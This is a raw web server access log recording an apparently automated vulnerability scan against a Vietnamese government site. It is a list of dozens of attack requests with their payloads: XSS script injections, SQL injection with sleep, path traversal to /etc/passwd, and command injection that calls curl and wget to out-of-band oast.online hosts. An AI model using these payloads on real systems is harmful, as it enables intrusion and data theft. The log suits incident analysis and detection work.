2023-10-13 08:21:44 103.153.214.94 GET / url=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205
2023-10-13 08:22:57 103.153.214.94 GET /login/ uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202
2023-10-13 08:22:59 103.153.214.94 GET / uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 202
2023-10-13 08:25:21 103.153.214.94 POST /wp-admin/admin-ajax.php action=moove_read_xml 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 203
2023-10-13 08:25:53 103.153.214.94 POST /index.php option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn 405 0 1 202
2023-10-13 08:25:55 103.153.214.94 POST /index.php option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 201
2023-10-13 08:25:58 103.153.214.94 GET / p=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 206
2023-10-13 08:27:44 103.153.214.94 GET /contact.php theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 199
2023-10-13 08:27:50 103.153.214.94 GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 203
2023-10-13 08:30:58 103.153.214.94 GET /find_v2/_click _t_id&_t_q&_t_hit.id&_t_redirect=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 199
2023-10-13 08:31:51 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204
2023-10-13 08:31:53 103.153.214.94 POST /checkValid - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 198
2023-10-13 08:31:55 103.153.214.94 GET /public/css/2WfF0hp2QuTS2QBJP4XGfGWb6BE.css - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 198
2023-10-13 08:35:03 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 200
2023-10-13 08:35:19 103.153.214.94 GET /index.php action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 200
2023-10-13 08:35:24 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 203
2023-10-13 08:35:26 103.153.214.94 GET /cgi-bin/execute_cmd.cgi timestamp=1589333279490&cmd=cat%20/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 200
2023-10-13 08:37:15 103.153.214.94 GET /CuteSoft_Client/CuteEditor/Template.aspx Referrer=XSS";><script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 202
2023-10-13 08:38:03 103.153.214.94 GET /infusions/downloads/downloads.php cat_id=${system(ls)} 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 204
2023-10-13 08:38:43 103.153.214.94 GET /config/getuser index=0 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201
2023-10-13 08:38:50 103.153.214.94 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 200
2023-10-13 08:39:24 103.153.214.94 POST /assets/_core/php/profile.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 199
2023-10-13 08:39:26 103.153.214.94 POST /assets/php/profile.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 198
2023-10-13 08:39:28 103.153.214.94 POST /vendor/qcubed/qcubed/assets/php/profile.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 199
2023-10-13 08:42:04 103.153.214.94 POST /var - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 201
2023-10-13 08:42:42 103.153.214.94 GET /cgi-bin/manlist section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/2WfF0o9xQhZ6Fr0aZ4X5TMKJ2Uz/)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201
2023-10-13 08:45:51 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 202
2023-10-13 08:45:52 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 198
2023-10-13 08:47:20 103.153.214.94 GET /console/login/LoginForm.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 203
2023-10-13 08:48:11 103.153.214.94 PUT /v1/kv/2WfF0jigDmDk6Aeq71rnOd6BtAK - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 206
2023-10-13 08:48:13 103.153.214.94 GET /v1/kv/2WfF0jigDmDk6Aeq71rnOd6BtAK raw 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201
2023-10-13 08:50:28 103.153.214.94 GET /dataservice/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 203
2023-10-13 08:51:05 103.153.214.94 GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 201
2023-10-13 08:52:15 103.153.214.94 GET /api/config - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 0 2 217
2023-10-13 08:52:36 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 208
2023-10-13 08:54:26 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 207
2023-10-13 08:55:07 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 209
2023-10-13 08:55:35 103.153.214.94 POST /api/graphql - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 0 2 212
2023-10-13 08:56:09 103.153.214.94 GET /wp-json/wp/v2/lesson/1 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202
2023-10-13 08:57:27 103.153.214.94 GET /Items/RemoteSearch/Image ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 202
2023-10-13 08:57:27 103.153.214.94 POST /login.htm - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 203
2023-10-13 08:58:06 103.153.214.94 GET /index.php page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 199
2023-10-13 09:00:56 103.153.214.94 GET /manage/fileDownloader sec=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200
2023-10-13 09:01:08 103.153.214.94 GET /pme/media/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 201
2023-10-13 09:01:29 103.153.214.94 GET /index.php download=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 199
2023-10-13 09:03:17 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 200
2023-10-13 09:04:56 103.153.214.94 GET /help/english/index.html javascript:alert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205
2023-10-13 09:08:16 103.153.214.94 GET /setup.cgi todo=debug&x=currentsetting.htm 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 209
2023-10-13 09:08:20 103.153.214.94 GET /webmail/ language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 203
2023-10-13 09:09:31 103.153.214.94 GET /api/settings/values - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 0 2 220
2023-10-13 09:12:39 103.153.214.94 GET /tos/index.php user/login 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 208
2023-10-13 09:12:41 103.153.214.94 POST /wizard/initialise.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/tos/index.php?user/login 405 0 1 204
2023-10-13 09:12:48 103.153.214.94 POST /api/v1/method.callAnon/sendForgotPasswordEmail - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 222
2023-10-13 09:13:12 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//ckjv7uic8b6p3donsoogpkkgr3is49bbm.oast.online+-H+'User-Agent%3a+AqSCr3'%60 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205
2023-10-13 09:13:14 103.153.214.94 GET /tos/index.php explorer/pathList&path=%60curl+http%3a//ckjv7uic8b6p3donsoogujiqz8wamz3u3.oast.online+-H+'User-Agent%3a+AqSCr3'%60 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208
2023-10-13 09:13:59 103.153.214.94 POST /assets/php/upload.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 http://bcvt.kontum.gov.vn 405 0 1 459
2023-10-13 09:14:00 103.153.214.94 GET /assets/data/usrimg/2wff0cfssjvhlyhhieaqrd89ei1.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 208
2023-10-13 09:14:35 103.153.214.94 GET /pacs/login.php message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 1083
2023-10-13 09:14:44 103.153.214.94 GET /index.php page=/etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205
2023-10-13 09:15:51 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/detail.php subdomain=ckjv7uic8b6p3donsooggbf8rddb4b4by.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209
2023-10-13 09:15:53 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/get.php subdomain=ckjv7uic8b6p3donsoogu64nc8omod88y.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208
2023-10-13 09:15:54 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/tree.php subdomain=ckjv7uic8b6p3donsoogi8is777h7zxwk.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204
2023-10-13 09:16:03 103.153.214.94 GET /dashboard/view-chair-list.php table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 204
2023-10-13 09:18:21 103.153.214.94 GET /addons/ q=%3Csvg%2Fonload%3Dalert(1)%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 206
2023-10-13 09:19:13 103.153.214.94 GET /s/2WfF0V7LLELtfoC0xQdv0qsKtA4/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207
2023-10-13 09:19:15 103.153.214.94 GET /s/2WfF0V7LLELtfoC0xQdv0qsKtA4/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 206
2023-10-13 09:20:21 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 212
2023-10-13 09:20:24 103.153.214.94 GET /ext-js/index.html - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 205
2023-10-13 09:21:45 103.153.214.94 POST /incom/modules/uploader/showcase/script.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 209
2023-10-13 09:21:47 103.153.214.94 GET /upload/userfiles/image/2WfF0whShUSKiXW62e2agtH7tzS.png - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 205
2023-10-13 09:22:03 103.153.214.94 GET /+CSCOE+/session_password.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 11 0 208
2023-10-13 09:23:29 103.153.214.94 GET /wp-content/plugins/easy-wp-smtp/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 208
2023-10-13 09:23:31 103.153.214.94 GET /wp-content/plugins/wp-mail-smtp-pro/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204
2023-10-13 09:23:35 103.153.214.94 GET /+CSCOT+/translation-table type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 11 0 205
2023-10-13 09:23:35 103.153.214.94 GET /+CSCOT+/oem-customization app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 11 0 205
2023-10-13 09:25:24 103.153.214.94 GET /server/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 206
2023-10-13 09:26:25 103.153.214.94 GET /q start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://ckjv7uic8b6p3donsoogtnjw8i8kweftb.oast.online%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204
2023-10-13 09:26:26 103.153.214.94 GET /wp-content/plugins/contact-form-7/readme.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 09:26:31 103.153.214.94 GET /searchblox/servlet/FileServlet col=9&url=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 09:27:30 103.153.214.94 GET /advanced_component_system/index.php ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 09:31:07 103.153.214.94 POST /goform/setSysAdm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/login.shtml 405 0 1 213
2023-10-13 09:31:50 103.153.214.94 POST /actions/authenticate.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 207
2023-10-13 09:34:00 103.153.214.94 GET /admin/histograms h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 301 0 0 211
2023-10-13 09:35:15 103.153.214.94 POST /+CSCOE+/saml/sp/acs tgname=a 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 11 0 215
2023-10-13 09:37:13 103.153.214.94 POST /auth/check - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 207
2023-10-13 09:39:53 103.153.214.94 POST /auth/requestreset - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 208
2023-10-13 09:39:53 103.153.214.94 POST /auth/requestreset - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 203
2023-10-13 09:40:53 103.153.214.94 POST /auth/newpassword - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 206
2023-10-13 09:45:32 103.153.214.94 GET /wp-content/plugins/quiz-master-next/README.md - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 213
2023-10-13 09:45:34 103.153.214.94 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206
2023-10-13 09:45:36 103.153.214.94 GET /index.php module=users/login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204
2023-10-13 09:46:33 103.153.214.94 GET /index.php module=users/login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 205
2023-10-13 09:47:03 103.153.214.94 GET /index.php module=users/login 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 207
2023-10-13 09:47:37 103.153.214.94 GET /index.php module=users/login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205
2023-10-13 09:49:03 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209
